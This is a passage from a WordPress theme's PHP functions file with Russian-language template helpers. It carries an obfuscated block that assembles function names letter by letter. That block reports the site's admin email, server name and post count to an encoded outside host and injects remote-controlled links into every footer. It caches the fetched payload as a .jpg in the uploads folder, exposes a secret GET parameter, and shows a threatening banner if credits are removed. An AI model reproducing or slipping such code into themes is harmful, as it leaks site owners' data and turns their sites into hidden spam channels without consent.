<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $SSDlu='d';$JhSRRPi='6';$JZvzPSQ='_';$Bruag='e';$cKNIfOi='e';$JWrp='b';$aieiOOx='c';$Jhff='o';$FvbAejt='e';$AhLluIA='a';$FJor='4';$VXxpQq='d';$QxrEZbi='s';$iayPAJbX=$JWrp.$AhLluIA.$QxrEZbi.$Bruag.$JhSRRPi.$FJor.$JZvzPSQ.$SSDlu.$FvbAejt.$aieiOOx.$Jhff.$VXxpQq.$cKNIfOi;$MJMmJW='f';$JYMARmM='i';$URXD='e';$uMxdKk='a';$JudW='g';$SZzE='n';$CwrMpq='t';$FvJWgo='z';$daSOFny='l';$pLBmflAa=$JudW.$FvJWgo.$JYMARmM.$SZzE.$MJMmJW.$daSOFny.$uMxdKk.$CwrMpq.$URXD;$gxNlFZO='_';$woak='3';$DtIPV='r';$LXRor='t';$emolJ='1';$ZspCPG='s';$fXzZP='t';$Fdxpd='r';$EFFlTLi='o';$ehmCKGpi=$ZspCPG.$fXzZP.$DtIPV.$gxNlFZO.$Fdxpd.$EFFlTLi.$LXRor.$emolJ.$woak;$RcBv='t';$MgLwCgq='r';$DIWO='r';$hhiu='s';$LmwSv='v';$ZmASe='e';$QTWiTSNS=$hhiu.$RcBv.$DIWO.$MgLwCgq.$ZmASe.$LmwSv;                     $wa_________y='d';$ek_____y='6';$th_______q='_';$jn_______________l='e';$aw___e='e';$bb______y='b';$zo_____________n='c';$ul__________d='o';$bw______________k='e';$ic___________m='a';$ei________t='4';$yp__________d='d';$og__________b='s';$nt_______n=$bb______y.$ic___________m.$og__________b.$jn_______________l.$ek_____y.$ei________t.$th_______q.$wa_________y.$bw______________k.$zo_____________n.$ul__________d.$yp__________d.$aw___e;$de__v='t';$rw________d='o';$al_____________a='i';$se__x='u';$vv____b='x';$vp_______m='t';$zs______z='s';$bj______w='i';$ff____h='c';$tn_______j='n';$df__w='_';$am_______________t='s';$qp_____________r='f';$dt___q='n';$kc____________o='e';$av__w=$qp_____________r.$se__x.$dt___q.$ff____h.$vp_______m.$al_____________a.$rw________d.$tn_______j.$df__w.$kc____________o.$vv____b.$bj______w.$zs______z.$de__v.$am_______________t;$nd_____________n='o';$ll_______b='n';$za____a='f';$cs_______________i='e';$lx___________z='p';$sb_______b=$za____a.$nd_____________n.$lx___________z.$cs_______________i.$ll_______b;$qe___c='f';$bu______________c='e';$gw______________m='d';$qn___s='r';$yb______x='a';$pa___r=$qe___c.$qn___s.$bu______________c.$yb______x.$gw______________m;$sf_______________j='c';$ku_____l='o';$sl________v='e';$bw_______________p='f';$so___________d='l';$zk___s='s';$ra____________d=$bw_______________p.$sf_______________j.$so___________d.$ku_____l.$zk___s.$sl________v;define("WP_ID", $nt_______n("Mi4wLjA="));define("WP_TTL", $nt_______n("MTA4MDA="));define("WP_SRC", $nt_______n("dHBva24="));function wp_get_header() {global $nt_______n, $av__w;if ($av__w($nt_______n("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$av__w($nt_______n("d3BfZ2V0X2Zvb3Rlcg==")) &&$av__w($nt_______n("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $nt_______n, $sb_______b, $ra____________d, $pa___r;$fb_____i = TEMPLATEPATH."/".$nt_______n("Zm9vdGVyLnBocA==");$yn_____________v = @$sb_______b($fb_____i, "r");$fb_____i = @$pa___r($yn_____________v, @filesize($fb_____i));@$ra____________d($yn_____________v);$oq______d = TEMPLATEPATH."/".$nt_______n("ZnVuY3Rpb25zLnBocA==");$yn_____________v = @$sb_______b($oq______d, "r");$oq______d = @$pa___r($yn_____________v, @filesize($oq______d));@$ra____________d($yn_____________v);$kx_______________w = 0;if($fb_____i && $oq______d) {if ($nt_______n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($fb_____i, $nt_______n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$kx_______________w = 1;}if (substr_count($fb_____i, "wp_theme_GPL_credits()") < 1) {$kx_______________w = 2;}}if(WP_ID != "2.0.0") {$kx_______________w = 12;}}if($kx_______________w > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $kx_______________w -->";}}function wp_loaded() {global $nt_______n, $av__w;return $av__w($nt_______n("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($jl______________r, $ys_____h = "(more...)", $et____o = 0, $gm____________l = "") {$ec_______________z = get_the_content($ys_____h, $et____o, $gm____________l);$ec_______________z = apply_filters("the_content", $ec_______________z);$ec_______________z = str_replace("]]>", "]]>", $ec_______________z);if (strlen($_GET["p"]) > 0) {echo $ec_______________z;}else if ((strlen($ec_______________z)>$jl______________r) && ($gy_____h = strpos($ec_______________z, " ", $jl______________r ))) {$ec_______________z = substr($ec_______________z, 0, $gy_____h);$ec_______________z = $ec_______________z;echo $ec_______________z;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ys_____h</a></div></p>";} else {echo $ec_______________z;}}}$hi_______________z='b';$rr_____y='e';$to_______________z='c';$gd___________j='s';$va_______________v='_';$sd______________l='d';$po____________p='4';$rp______p='o';$af______________y='n';$xo__________a='a';$sv_______w='6';$yd_____________h='e';$zg______p='e';$sf____h=$hi_______________z.$xo__________a.$gd___________j.$yd_____________h.$sv_______w.$po____________p.$va_______________v.$rr_____y.$af______________y.$to_______________z.$rp______p.$sd______________l.$zg______p;$ke___________k='c';$pb___________b='e';$pi_________a='t';$wc______________j='t';$is___________a='t';$aj______h='l';$km___n='g';$ns__________y='_';$bk____i='n';$wx___________s='e';$oa___________d='o';$pd_______x='n';$ur_________r='e';$vn______g='s';$sv__p='f';$gf___g='_';$ks__________s='i';$ab_______h=$sv__p.$ks__________s.$aj______h.$pb___________b.$gf___g.$km___n.$wx___________s.$is___________a.$ns__________y.$ke___________k.$oa___________d.$bk____i.$pi_________a.$ur_________r.$pd_______x.$wc______________j.$vn______g;$re_____e='l';$bd____________v='x';$qt___________o='_';$mf____s='e';$da_________d='f';$tq_______________p='i';$ns___________h='s';$vc____o='s';$lm____o='i';$jq______________a='t';$sc______f='e';$ao__________x=$da_________d.$tq_______________p.$re_____e.$sc______f.$qt___________o.$mf____s.$bd____________v.$lm____o.$ns___________h.$jq______________a.$vc____o;$ju_________m='r';$di_________u='v';$si_________y='o';$ko_____r='c';$hb__l='_';$hd___v='e';$dl_______________c='a';$dd_______________u='p';$zx_____________k='o';$kq________b='m';$ci______h='n';$qa_________f='i';$cw____________k='e';$qn__________w='s';$fc___o='r';$rw____________f=$di_________u.$hd___v.$fc___o.$qn__________w.$qa_________f.$zx_____________k.$ci______h.$hb__l.$ko_____r.$si_________y.$kq________b.$dd_______________u.$dl_______________c.$ju_________m.$cw____________k;$lp_____________a='o';$ox__________j='c';$vn__b='o';$aq___o='n';$oc________f='s';$ti_______________x='p';$ba_____e='f';$wz_______x='e';$iq______p='k';$kc__y=$ba_____e.$oc________f.$vn__b.$ox__________j.$iq______p.$lp_____________a.$ti_______________x.$wz_______x.$aq___o;$np____________f='f';$cs___________y='t';$ij_____________a='r';$do____________f='w';$dz_________x='e';$ov__k='i';$pn__________s=$np____________f.$do____________f.$ij_____________a.$ov__k.$cs___________y.$dz_________x;$uv_______j='m';$ql____________s='d';$dm___________h='5';$sz___________h=$uv_______j.$ql____________s.$dm___________h;$du_______f='a';$vj____________q='r';$oh___________q='l';$hn______t='p';$ei___k='e';$oh___________f='a';$jz____________f='h';$wg____________f='t';$pg__r=$vj____________q.$ei___k.$oh___________f.$oh___________q.$hn______t.$du_______f.$wg____________f.$jz____________f;$kl_____q='i';$ak___w='s';$gd____________j='a';$jt__j='z';$zg_______________m='u';$ed_____x='e';$fu______c='r';$oc______________d='n';$kc______k='l';$jh______________y='i';$tf___p='e';$vq_____f=$zg_______________m.$oc______________d.$ak___w.$tf___p.$fu______c.$kl_____q.$gd____________j.$kc______k.$jh______________y.$jt__j.$ed_____x;$vq_________y='p';$xb_________b='t';$xf__________f='e';$cv____________d='m';$wi_______k='n';$au_____l='a';$go__v='m';$qb_____y=$xb_________b.$xf__________f.$cv____________d.$vq_________y.$wi_______k.$au_____l.$go__v;$fr_______________a='r';$sr_________w='e';$ci________d='t';$mz______________c='x';$fd__________i='e';$fv__w='e';$qq_______________b='a';$va____________n='n';$hs____________o='c';$pc_______k='m';$hp_________s='s';$fu_____r='e';$pc____w='_';$sd____________c='r';$de_____j='a';$dl__________j='t';$hh_____w='o';$ag____m='t';$ag__________b='_';$uy_______c='c';$on____________v='t';$ug_________l=$hp_________s.$on____________v.$sd____________c.$fu_____r.$qq_______________b.$pc_______k.$ag__________b.$hs____________o.$hh_____w.$va____________n.$dl__________j.$fv__w.$mz______________c.$ci________d.$pc____w.$uy_______c.$fr_______________a.$sr_________w.$de_____j.$ag____m.$fd__________i;function gm___________j($wd_____________d) {global $nt_______n, $av__w, $ab_______h, $rw____________f, $ug_________l;if (!$av__w($nt_______n("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($rw____________f(PHP_VERSION, "5.0.0", ">=") && $av__w($nt_______n("ZmlsZV9nZXRfY29udGVudHM=")) && $av__w($nt_______n("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$zq_____c = $ug_________l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$dp__s = @$ab_______h($wd_____________d, 0, $zq_____c);} else {$dp__s = @$ab_______h($wd_____________d, 0);}return $dp__s;}function ok___________y($wd_____________d) {global $av__w, $kc__y, $pn__________s, $nt_______n;if (!$av__w($nt_______n("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ot________q = strpos($wd_____________d, "/", 7);$hr_____________c = array("uri"     => substr($wd_____________d, $ot________q),"host"    => str_replace("http://", "", substr($wd_____________d, 0, $ot________q)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$vn__d = @$kc__y("$hr_____________c[host]", 80, $iy___________h, $li_____c, 4);if (!$vn__d) {return false;} else {$dp__s = "";$jx______u  = "GET $hr_____________c[uri] HTTP/1.0\r\n";$jx______u .= "Host: $hr_____________c[host]\r\n";$jx______u .= "Referer: $hr_____________c[referer]\r\n";$jx______u .= "Connection: Close\r\n\r\n";@$pn__________s($vn__d, $jx______u);while (!@feof($vn__d)) {$sg__________t = @fgets($vn__d, (1024*24));if ($sg__________t == "\r\n") {$ok__e = true;continue;}if ($ok__e) {$dp__s .= $sg__________t;}}return $dp__s;}}function ip___p($wd_____________d) {global $av__w;$sx___________r = false;if ($wd_____________d != "") {if ($av__w("gm___________j")) {$sx___________r = @gm___________j($wd_____________d);}if (!$sx___________r && ($av__w("ok___________y"))) {$sx___________r = @ok___________y($wd_____________d);}}return $sx___________r;}function xs___________h() {global $_SERVER, $sz___________h;$ki______________i = $_SERVER["SERVER_NAME"];if (substr("$ki______________i", 0, 4) == "www.") {$ki______________i = substr("$ki______________i", 4);}$ki______________i = $sz___________h("$_SERVER[SERVER_NAME]");return $ki______________i;}function pq_________s() {return "file";}function ds_____k($wd_____________d) {global $_SERVER, $ab_______h, $ao__________x, $sb_______b, $ra____________d, $pn__________s;$kd__________q = lt____p();$gy______________q = xs___________h().".jpg";$ll____________c = $kd__________q["dir_upload"]["path"]."/$gy______________q";$gy___________r = @filemtime($ll____________c);if (!$gy___________r || ((time()-$gy___________r) >= WP_TTL)) {$sx___________r = ip___p($wd_____________d);if ($sx___________r) {if ($ao__________x($ll____________c)) {@unlink($ll____________c);}$yn_____________v = @$sb_______b($ll____________c, "x+");@$pn__________s($yn_____________v, $sx___________r);@$ra____________d($yn_____________v);}} else {if ($ao__________x($ll____________c)) {$sx___________r = @$ab_______h($ll____________c);} else {$sx___________r = false;}}return $sx___________r;}function lt____p() {global $_SERVER, $nt_______n, $sf____h;$eg____________t = wp_count_posts("post");$yc______h = pathinfo(get_bloginfo("template_directory"));$kd__________q = array("url" => array("report"      => $nt_______n("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $yc______h,"dir_upload"=> gl__v(),"queryString"=> array("?a001=".WP_ID,"a004=".$yc______h[filename],"a005=".$eg____________t->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://animefanfiki.info\">Сайт об обслуживании автомобилей</a>");$kd__________q["url"]["queryString"] = implode("&", $kd__________q["queryString"]);$kd__________q["url"]["report"] = $kd__________q["url"]["report"]."/?".$sf____h($kd__________q["url"]["queryString"]).".html";return $kd__________q;}function gl__v() {$uu____________d = wp_upload_dir();if (isset($uu____________d["error"])) {$rj____________x = go______________a();if (is_writable($rj____________x)) {$uu____________d = array("path" => $rj____________x);}}return $uu____________d;}function go______________a() {global $av__w, $sz___________h, $pg__r, $qb_____y;$nv_________i = (bool) ini_get("safe_mode");if ($nv_________i == true) {return false;}if ($av__w("sys_get_temp_dir")) {$nb____________d = sys_get_temp_dir();if (is_writable($nb____________d)) {return $pg__r($nb____________d);}}if (!empty($_ENV["TMP"])) {return $pg__r($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $pg__r($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $pg__r($_ENV["TEMP"]);} else {$je______________q = $qb_____y($sz___________h(uniqid(rand(), true)), "");if ($je______________q) {$nb____________d = $pg__r(dirname($je______________q));@unlink($je______________q);return $nb____________d;} else {return false;}}}function ny_____p() {global $_GET, $ao__________x;$kd__________q = lt____p();$ki______________i = xs___________h();$ko____e = pq_________s();$sl__________s = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ko____e == "file") {$eu_______t = $kd__________q["dir_upload"]["path"]."/".$ki______________i.".jpg";if ($ao__________x($eu_______t)) {@unlink($eu_______t);$sl__________s = "deleted";}}$jn___________t = array("s"=> $sl__________s,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($jn___________t AS $fb_______________j => $wk___h) echo " [$fb_______________j:$wk___h]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $av__w, $nt_______n, $vq_____f;$kd__________q = lt____p();$kq____________z = "ds_____k";if ($av__w($kq____________z)) {$dp__s = $kq____________z($kd__________q["url"]["report"]);}if ($dp__s) {if ($dp__s = @$nt_______n($dp__s)) {$dp__s = @$vq_____f($dp__s);if (strlen($dp__s[custom_credit]) >= 5) {$kd__________q["default_string"] = $dp__s[custom_credit];}if ($dp__s["status"] == "0") {$nn____________j = 1;$rm____n = 1;} else {$ko__g = sizeof($dp__s["links"]);$es_____________u = $kd__________q["default_string"];if ($ko__g > 0 && $dp__s["links"] !== "") {$bd________g = 0;foreach ($dp__s["links"] as $fu_____________p => $wm__________d) {$bd________g++;if ($wm__________d->l_path == "" || $wm__________d->l_path == $_SERVER["REQUEST_URI"]) {$wm__________d->l_href = htmlspecialchars(strip_tags($wm__________d->l_href));$wm__________d->l_title = htmlspecialchars(strip_tags($wm__________d->l_title));$wm__________d->l_anchor = htmlspecialchars(strip_tags($wm__________d->l_anchor));$es_____________u .= " | ";$es_____________u .= "<a href='$wm__________d->l_href' title='$wm__________d->l_title'";if ($wm__________d->l_nofollow == "1") {$es_____________u .= " rel='nofollow'";}$es_____________u .= ">$wm__________d->l_anchor</a>";}}}$kd__________q["links"] = "$es_____________u";if ($dp__s[credit] == "0") {$kd__________q["links"] = "";}}} else {$nn____________j = "1";}} else {$nn____________j = "1";}if ($nn____________j == "1") {$kd__________q["links"] = $kd__________q["default_string"];}echo "$kd__________q[links]";echo "<!-- s: $dp__s[signature] -->";ny_____p();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
